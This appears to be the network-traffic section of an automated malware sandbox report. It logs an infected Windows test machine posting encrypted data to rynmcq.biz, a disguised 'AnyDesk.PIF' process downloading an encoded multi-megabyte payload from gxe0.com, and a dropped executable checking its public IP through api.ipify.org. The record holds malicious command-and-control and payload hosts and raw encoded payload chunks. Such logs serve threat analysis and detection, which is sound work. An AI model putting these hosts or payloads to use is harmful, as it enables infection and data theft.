                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.353030920 CET778OUTData Raw: ad 91 0f 47 f3 a3 64 de fe 02 00 00 c3 ce d1 f1 3b fb b0 be cf c9 c1 23 1e c7 de c6 98 2e 04 ea f7 4c fd b3 e7 94 7f 04 9b 13 45 e8 36 81 a0 9b e6 87 40 07 18 2a 55 5a 28 26 c0 78 92 73 ef 2d c6 c0 9b 32 6e 35 4c 58 d6 22 95 08 fc fe bb 06 37 9a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Gd;#.LE6@*UZ(&xs-2n5LX"7nQ5=t'3be]x\KUVp ^KHRL^mA5.>_;MQ,lf>la4$pX9Vx8;btxjOS?^vy1


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        149192.168.2.105012854.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.019118071 CET345OUTPOST /qwi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.019162893 CET834OUTData Raw: b2 b7 ab 3d ec 9d 7b 7e 36 03 00 00 96 fd c1 41 ac ee 28 cd 8b 29 43 a2 a4 27 80 b5 24 0f a5 25 2a fb ce d7 40 3c 83 df c2 6a 04 8a dd 4a 37 26 a5 f6 ea 5a 12 0a 5c b2 92 28 0a 42 0e cb 4f d2 1d 41 e6 61 aa 7d 65 15 ab 6a d9 98 b4 88 fc 5d 31 fd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ={~6A()C'$%*@<jJ7&Z\(BOAa}ej]19:P?!d(uw.<0x,`A3lm1Sw-Myz?QNDwz|:S_0$lX?3;x[~"a~bJpA\[
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.826131105 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=9cd1f75db5fd0e59a999da8fbbb2f217|155.94.241.187|1731920387|1731920387|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        0192.168.2.1049731198.252.105.914438060C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC162OUTGET /yak2/233_Juqmtmyadyy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gxe0.com
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        last-modified: Thu, 14 Nov 2024 22:46:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        content-length: 3182288
                                                                                                                                                                                                                                                                                                                                                                                                                                        date: Mon, 18 Nov 2024 08:57:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 66 47 78 6f 54 45 43 41 55 4a 42 55 57 49 52 67 68 4a 79 59 58 48 79 59 51 47 68 4d 55 44 67 34 57 4a 52 30 65 46 41 34 57 49 42 34 53 44 67 38 55 48 78 6b 4f 49 43 55 61 48 61 61 75 70 56 6b 6a 70 37 46 4c 56 53 49 65 47 69 45 61 4a 67 34 52 4a 69 61 6d 72 71 56 5a 49 36 65 78 53 31 35 36 65 58 4a 76 58 33 4e 6a 64 48 56 67 64 32 42 6d 5a 58 5a 65 5a 57 39 35 63 6e 4e 74 62 58 56 6b 58 46 31 7a 62 58 56 66 58 58 46 74 62 6e 4e 65 65 47 31 66 5a 48 6c 63 58 6e 70 35 63 6d 39 66 63 32 4e 30 64 57 42 33 59 47 5a 6c 64 6c 35 6c 62 33 6c 79 63 32 31 74 64 57 52 63 58 58 4e 74 64 56 39 64 63 57 31 75 63 31 35 34 62 56 39 6b 65 56 78 65 65 6e 6c 79 62 31 39 7a 59 33 52 31 59 48 64 67 5a 6d 56 32 58 6d 56 76 65 58 4a 7a 62 57 31
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: pq6lWSOnsUsfGxoTECAUJBUWIRghJyYXHyYQGhMUDg4WJR0eFA4WIB4SDg8UHxkOICUaHaaupVkjp7FLVSIeGiEaJg4RJiamrqVZI6exS156eXJvX3NjdHVgd2BmZXZeZW95cnNtbXVkXF1zbXVfXXFtbnNeeG1fZHlcXnp5cm9fc2N0dWB3YGZldl5lb3lyc21tdWRcXXNtdV9dcW1uc154bV9keVxeenlyb19zY3R1YHdgZmV2XmVveXJzbW1
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC16384INData Raw: 41 42 65 38 51 43 4a 4b 32 34 6b 4c 41 59 78 71 65 6d 4b 4e 61 4e 72 7a 4a 4a 68 65 30 4e 41 64 6a 66 46 4f 44 2b 67 6c 78 48 76 7a 6e 75 42 4b 38 78 2b 78 43 47 76 47 41 42 77 48 69 54 37 63 38 2b 7a 46 57 37 72 2f 4a 4e 6d 4e 7a 4b 57 61 4b 4b 49 53 31 44 52 4e 4f 6d 49 69 47 50 74 6f 4b 79 56 55 49 70 32 45 57 69 69 68 61 6e 6e 68 61 76 6d 33 54 59 6a 53 48 58 70 72 59 32 4b 57 76 67 69 42 63 36 62 46 6e 6b 78 33 32 65 52 4f 38 4e 48 69 31 32 46 54 42 34 49 6e 4d 6b 4b 35 58 44 59 34 56 6a 35 66 49 62 63 68 63 48 5a 74 47 52 64 64 30 48 75 67 58 6f 67 50 32 66 4c 45 46 65 37 43 62 4c 30 73 45 52 73 43 41 62 53 42 73 2f 7a 47 33 48 46 4e 68 72 4f 61 59 4c 43 52 37 78 41 73 4e 4b 74 62 6f 48 42 43 30 57 44 32 57 31 64 33 52 74 59 44 71 42 54 78 56 42 67
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ABe8QCJK24kLAYxqemKNaNrzJJhe0NAdjfFOD+glxHvznuBK8x+xCGvGABwHiT7c8+zFW7r/JNmNzKWaKKIS1DRNOmIiGPtoKyVUIp2EWiihannhavm3TYjSHXprY2KWvgiBc6bFnkx32eRO8NHi12FTB4InMkK5XDY4Vj5fIbchcHZtGRdd0HugXogP2fLEFe7CbL0sERsCAbSBs/zG3HFNhrOaYLCR7xAsNKtboHBC0WD2W1d3RtYDqBTxVBg
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC16384INData Raw: 71 50 57 2b 4c 2f 71 44 6b 46 4b 32 36 6e 36 70 78 5a 71 59 4f 36 64 34 6b 55 61 57 4a 6f 6f 49 79 52 64 6b 50 59 77 70 55 47 30 63 65 68 6f 52 6e 35 2b 6a 49 6e 58 6b 46 50 31 38 69 4f 53 69 49 4b 67 72 47 4b 4e 32 53 2f 6b 68 59 43 61 2f 51 47 51 78 4c 6c 4a 51 47 4a 4c 32 36 47 52 35 6c 45 30 56 73 36 49 4c 41 75 49 71 71 37 33 37 58 52 5a 68 43 7a 6d 5a 5a 47 78 68 64 33 4c 36 73 6d 39 7a 2b 55 6a 72 65 71 43 50 49 46 39 4f 6a 47 78 79 42 6d 30 48 51 65 6d 37 4d 6e 77 56 66 41 75 57 59 6c 6c 6d 45 33 4e 74 64 5a 77 69 59 59 54 41 31 4b 33 6c 72 54 6b 57 42 45 6b 37 63 6a 46 79 6d 56 39 7a 59 6e 53 55 45 42 61 51 44 4b 70 64 76 69 64 69 59 61 79 56 59 44 62 43 36 74 4d 77 6a 33 61 4c 74 52 6e 56 78 51 37 64 34 61 57 44 58 57 66 62 62 77 31 30 54 32 4a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: qPW+L/qDkFK26n6pxZqYO6d4kUaWJooIyRdkPYwpUG0cehoRn5+jInXkFP18iOSiIKgrGKN2S/khYCa/QGQxLlJQGJL26GR5lE0Vs6ILAuIqq737XRZhCzmZZGxhd3L6sm9z+UjreqCPIF9OjGxyBm0HQem7MnwVfAuWYllmE3NtdZwiYYTA1K3lrTkWBEk7cjFymV9zYnSUEBaQDKpdvidiYayVYDbC6tMwj3aLtRnVxQ7d4aWDXWfbbw10T2J
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC16384INData Raw: 56 31 79 7a 71 30 36 6f 78 35 37 2b 62 72 6e 78 74 61 43 66 6e 69 75 55 33 39 35 4b 58 57 32 69 71 43 4c 71 7a 30 69 6d 44 75 4c 32 4c 66 6d 55 68 39 68 5a 31 37 54 42 46 77 6c 44 55 64 72 36 77 55 56 61 36 73 6b 71 53 6a 77 6d 4c 34 37 4f 53 59 75 6a 6f 73 33 74 45 4f 66 59 55 39 7a 4f 64 66 35 41 54 5a 37 32 42 6c 55 41 64 79 78 4c 31 2f 38 2f 37 37 7a 76 70 39 30 36 72 43 53 76 6f 72 56 63 75 65 50 54 39 72 66 5a 43 42 77 6f 74 51 54 39 47 41 52 4b 6f 37 46 42 4e 32 65 46 77 2b 63 57 47 35 30 59 67 69 46 64 6b 66 2f 67 42 76 4f 66 55 6d 2f 35 79 47 65 73 34 34 52 66 4a 6d 57 73 59 57 74 77 61 56 54 5a 6a 53 43 46 57 59 77 72 77 39 43 54 50 47 31 75 58 58 47 79 78 4e 63 43 65 65 31 6c 74 5a 4e 4a 38 45 51 62 51 51 68 71 66 35 52 5a 72 6b 79 61 6d 75 4a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: V1yzq06ox57+brnxtaCfniuU395KXW2iqCLqz0imDuL2LfmUh9hZ17TBFwlDUdr6wUVa6skqSjwmL47OSYujos3tEOfYU9zOdf5ATZ72BlUAdyxL1/8/77zvp906rCSvorVcuePT9rfZCBwotQT9GARKo7FBN2eFw+cWG50YgiFdkf/gBvOfUm/5yGes44RfJmWsYWtwaVTZjSCFWYwrw9CTPG1uXXGyxNcCee1ltZNJ8EQbQQhqf5RZrkyamuJ
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC16384INData Raw: 6c 39 2f 45 49 52 64 4c 30 42 36 64 36 4f 4e 6e 70 65 76 48 76 48 42 74 64 7a 79 78 58 57 36 71 59 2b 51 35 6f 65 2f 36 4d 56 35 31 42 48 56 78 58 49 53 47 6c 65 2f 73 32 6c 52 75 6b 42 37 67 41 75 48 53 72 74 52 73 41 73 36 4b 42 42 4c 47 33 57 49 66 55 65 6a 47 45 4a 62 68 58 50 41 6f 62 35 2f 6e 51 63 78 51 49 58 43 55 35 77 31 37 4c 53 5a 34 70 57 4d 6f 47 6d 51 39 47 33 59 68 70 59 30 7a 34 39 51 58 38 36 42 49 55 61 4d 63 67 61 67 74 56 41 41 41 32 58 66 67 4e 43 62 61 79 46 45 49 48 67 51 32 51 79 52 59 38 54 4c 6c 39 7a 35 6d 77 46 2b 6b 76 61 55 54 63 58 72 6e 45 75 47 38 66 6a 45 32 50 6a 50 61 34 69 65 75 79 52 4c 48 37 74 64 75 5a 36 4f 74 64 39 6d 35 41 50 76 50 37 4b 68 2f 66 6d 50 39 66 2b 77 35 53 70 78 69 77 53 6d 58 32 75 5a 4e 66 78 52
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l9/EIRdL0B6d6ONnpevHvHBtdzyxXW6qY+Q5oe/6MV51BHVxXISGle/s2lRukB7gAuHSrtRsAs6KBBLG3WIfUejGEJbhXPAob5/nQcxQIXCU5w17LSZ4pWMoGmQ9G3YhpY0z49QX86BIUaMcgagtVAAA2XfgNCbayFEIHgQ2QyRY8TLl9z5mwF+kvaUTcXrnEuG8fjE2PjPa4ieuyRLH7tduZ6Otd9m5APvP7Kh/fmP9f+w5SpxiwSmX2uZNfxR
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC16384INData Raw: 4d 6c 76 2f 6a 6e 6d 6b 50 54 4b 36 66 42 4f 6f 4d 50 43 46 55 42 4e 39 6a 30 45 42 46 32 7a 67 6d 62 55 38 61 4f 55 61 41 6d 43 66 76 6d 6c 68 61 35 50 4c 65 36 50 65 37 4a 36 59 6d 6a 6a 30 6e 75 46 59 6c 32 78 73 65 4a 6a 51 41 56 74 6e 53 6b 65 42 55 72 47 4f 42 48 31 79 2f 43 32 4d 68 4e 49 4b 4c 73 43 6d 38 63 78 71 62 34 32 70 4b 33 4b 36 36 51 55 4b 64 62 2b 6d 35 47 41 35 47 6c 67 47 35 58 72 46 2b 70 68 68 75 66 73 63 52 76 62 46 31 58 50 70 61 33 52 45 53 6e 39 34 4d 46 48 70 2f 62 44 77 75 42 39 4a 62 32 32 63 50 61 4a 69 31 57 71 6e 45 55 6f 79 2f 68 44 61 6e 4b 7a 37 75 47 51 57 4d 68 6a 42 47 6c 52 71 53 49 49 5a 30 54 73 33 4e 62 58 30 73 48 6b 66 59 52 73 47 32 75 75 62 73 48 66 77 68 42 49 58 45 36 4d 37 62 56 42 75 51 54 35 67 68 69 36
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Mlv/jnmkPTK6fBOoMPCFUBN9j0EBF2zgmbU8aOUaAmCfvmlha5PLe6Pe7J6Ymjj0nuFYl2xseJjQAVtnSkeBUrGOBH1y/C2MhNIKLsCm8cxqb42pK3K66QUKdb+m5GA5GlgG5XrF+phhufscRvbF1XPpa3RESn94MFHp/bDwuB9Jb22cPaJi1WqnEUoy/hDanKz7uGQWMhjBGlRqSIIZ0Ts3NbX0sHkfYRsG2uubsHfwhBIXE6M7bVBuQT5ghi6
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC16384INData Raw: 6c 49 36 6e 50 4a 4a 67 6e 61 72 57 71 35 44 39 37 64 39 6c 30 37 46 6b 44 4c 53 5a 65 30 38 4b 71 6a 61 45 67 58 58 38 58 48 56 46 52 41 70 74 68 55 4f 56 73 68 71 58 37 46 43 2b 42 5a 4f 76 79 56 6f 72 46 54 62 30 2b 72 76 51 66 53 37 4c 59 45 59 4c 54 66 6c 48 78 49 30 73 6b 75 6c 6c 56 50 31 45 70 50 71 4a 72 32 77 69 6d 41 46 69 65 69 55 66 34 51 6c 2b 42 47 44 4a 36 48 76 37 65 30 46 79 36 6b 45 48 76 6d 7a 43 65 71 67 6b 75 68 4f 42 43 54 75 33 31 63 5a 45 52 4c 6f 52 71 47 4b 6c 6d 74 62 78 37 6d 4b 46 48 4c 4a 7a 65 6b 50 66 79 68 51 45 64 45 57 4f 4d 45 76 58 57 55 76 37 64 4c 51 50 4e 67 6c 4e 76 36 47 51 36 68 6c 50 77 78 6a 49 79 33 51 6a 6a 4d 53 68 31 4f 53 53 79 2f 6e 57 52 6d 34 35 61 65 77 72 63 6b 5a 41 61 6d 6c 64 44 67 4a 32 54 73 5a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lI6nPJJgnarWq5D97d9l07FkDLSZe08KqjaEgXX8XHVFRApthUOVshqX7FC+BZOvyVorFTb0+rvQfS7LYEYLTflHxI0skullVP1EpPqJr2wimAFieiUf4Ql+BGDJ6Hv7e0Fy6kEHvmzCeqgkuhOBCTu31cZERLoRqGKlmtbx7mKFHLJzekPfyhQEdEWOMEvXWUv7dLQPNglNv6GQ6hlPwxjIy3QjjMSh1OSSy/nWRm45aewrckZAamldDgJ2TsZ
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC16384INData Raw: 44 76 6c 4e 6f 58 78 47 76 52 57 4c 6c 4e 74 6a 49 2f 69 7a 57 63 79 4a 54 6d 4b 53 63 77 32 64 71 72 63 56 6a 67 4c 61 68 44 61 37 65 48 50 6c 71 48 6d 62 64 6a 4c 6f 44 5a 72 46 68 2f 35 4d 38 2f 54 42 77 54 46 6c 6e 32 31 6d 5a 73 38 66 4b 47 6f 79 42 73 68 4e 77 46 34 52 41 61 2f 58 6a 6b 2f 4c 78 59 66 61 65 70 6d 4d 65 59 4e 6b 73 33 6b 75 72 39 46 56 61 51 35 46 59 46 5a 73 35 61 36 48 49 37 6e 64 56 75 63 52 44 58 52 76 4c 67 44 7a 4b 4b 30 43 47 38 35 4b 4d 41 58 4f 70 66 38 73 38 53 6a 35 47 62 52 34 65 57 70 39 62 6e 4f 37 73 6b 69 71 43 37 61 36 79 5a 34 77 63 32 34 61 64 79 74 79 78 35 62 52 48 58 6a 31 67 34 55 79 42 71 4e 4a 68 4f 38 4d 64 34 72 6c 6f 4d 62 43 4d 76 4c 58 67 55 2f 2f 75 64 79 32 57 56 4e 44 6f 48 4d 79 76 64 67 4c 67 4b 32
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: DvlNoXxGvRWLlNtjI/izWcyJTmKScw2dqrcVjgLahDa7eHPlqHmbdjLoDZrFh/5M8/TBwTFln21mZs8fKGoyBshNwF4RAa/Xjk/LxYfaepmMeYNks3kur9FVaQ5FYFZs5a6HI7ndVucRDXRvLgDzKK0CG85KMAXOpf8s8Sj5GbR4eWp9bnO7skiqC7a6yZ4wc24adytyx5bRHXj1g4UyBqNJhO8Md4rloMbCMvLXgU//udy2WVNDoHMyvdgLgK2
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC16384INData Raw: 71 49 55 33 78 59 39 4a 6b 31 73 63 42 49 59 63 67 6e 2b 41 7a 58 67 78 50 62 62 64 32 47 79 45 77 73 63 44 44 36 37 68 51 49 45 72 75 57 32 4c 32 41 46 70 50 32 48 33 75 35 36 49 64 48 62 7a 34 36 32 78 5a 77 71 4f 64 52 48 59 49 47 59 66 51 44 73 6b 6b 51 64 58 74 4b 73 6f 44 38 62 6b 64 43 76 36 35 73 67 77 61 4d 46 72 66 68 42 75 69 75 37 43 36 49 34 4b 79 30 7a 52 56 57 65 38 55 63 4d 52 4a 33 37 6b 48 70 6b 7a 6e 58 5a 30 65 77 37 37 46 4a 6b 31 48 4d 67 65 54 52 76 7a 67 47 73 4a 33 65 78 65 36 53 35 31 4f 54 35 6a 37 68 4f 75 74 33 6a 65 30 2f 79 52 64 57 72 5a 77 59 57 62 49 56 34 32 65 2b 33 6a 4c 51 2b 4d 4b 44 6d 7a 79 53 32 66 73 58 42 77 37 55 50 41 67 41 52 71 44 4e 35 37 46 6c 66 30 57 4a 58 5a 4c 4e 74 38 6a 68 53 67 74 77 38 58 72 49 42
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: qIU3xY9Jk1scBIYcgn+AzXgxPbbd2GyEwscDD67hQIEruW2L2AFpP2H3u56IdHbz462xZwqOdRHYIGYfQDskkQdXtKsoD8bkdCv65sgwaMFrfhBuiu7C6I4Ky0zRVWe8UcMRJ37kHpkznXZ0ew77FJk1HMgeTRvzgGsJ3exe6S51OT5j7hOut3je0/yRdWrZwYWbIV42e+3jLQ+MKDmzyS2fsXBw7UPAgARqDN57Flf0WJXZLNt8jhSgtw8XrIB
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:17 UTC16384INData Raw: 6b 38 34 74 42 70 4e 6f 41 5a 5a 6b 6d 54 65 72 5a 32 58 30 72 74 4e 41 4c 46 69 63 76 75 36 36 66 6f 37 67 4a 5a 49 31 55 61 6e 42 64 55 56 63 51 68 61 61 64 72 56 58 2f 76 52 70 4d 35 58 71 63 2f 31 43 49 4b 63 4c 46 54 4a 76 44 55 32 32 6b 41 4a 4d 4e 71 59 61 6b 57 2f 4f 74 71 53 59 59 33 31 75 71 6b 6e 45 39 61 49 42 30 72 4d 68 61 58 4d 57 76 73 76 77 71 32 46 2b 31 37 44 54 45 78 47 54 6e 6a 4f 61 4e 5a 73 68 2f 6d 71 65 70 4d 48 76 50 32 6e 63 64 44 79 64 54 33 6f 6e 5a 51 69 31 6d 53 50 4c 5a 42 46 35 52 70 51 5a 63 70 45 72 64 6d 47 51 43 58 2b 45 31 52 6c 31 75 6e 6c 74 71 65 37 45 51 64 48 52 55 55 70 55 57 65 45 43 71 54 6d 2b 77 6c 6e 68 35 64 62 56 57 6c 4b 74 48 6d 66 5a 31 49 6b 34 66 48 71 67 55 32 4e 31 44 66 39 47 49 4b 5a 66 51 69 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: k84tBpNoAZZkmTerZ2X0rtNALFicvu66fo7gJZI1UanBdUVcQhaadrVX/vRpM5Xqc/1CIKcLFTJvDU22kAJMNqYakW/OtqSYY31uqknE9aIB0rMhaXMWvsvwq2F+17DTExGTnjOaNZsh/mqepMHvP2ncdDydT3onZQi1mSPLZBF5RpQZcpErdmGQCX+E1Rl1unltqe7EQdHRUUpUWeECqTm+wlnh5dbVWlKtHmfZ1Ik4fHqgU2N1Df9GIKZfQil


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        1192.168.2.1049824104.26.13.2054437256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:34 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:34 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                        CF-RAY: 8e46c0f4ab696be3-DFW
                                                                                                                                                                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=2253696&cwnd=250&unsent_bytes=0&cid=8536b3248482d984&ts=567&x=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:34 UTC14INData Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 155.94.241.187


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        2192.168.2.1049940104.26.13.2054433996C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:54 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:55 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                        CF-RAY: 8e46c17659e246de-DFW
                                                                                                                                                                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1811&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1537971&cwnd=251&unsent_bytes=0&cid=f7c32237b9eec937&ts=232&x=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:55 UTC14INData Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 155.94.241.187


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        3192.168.2.1049953104.26.13.205443
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:57 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:57 UTC398INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                        CF-RAY: 8e46c1877df16b50-DFW
                                                                                                                                                                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=961&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=2949083&cwnd=251&unsent_bytes=0&cid=f5cc3ea58f62075c&ts=218&x=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18 08:57:57 UTC14INData Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 155.94.241.187


                                                                                                                                                                                                                                                                                                                                                                                                                                        SMTP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
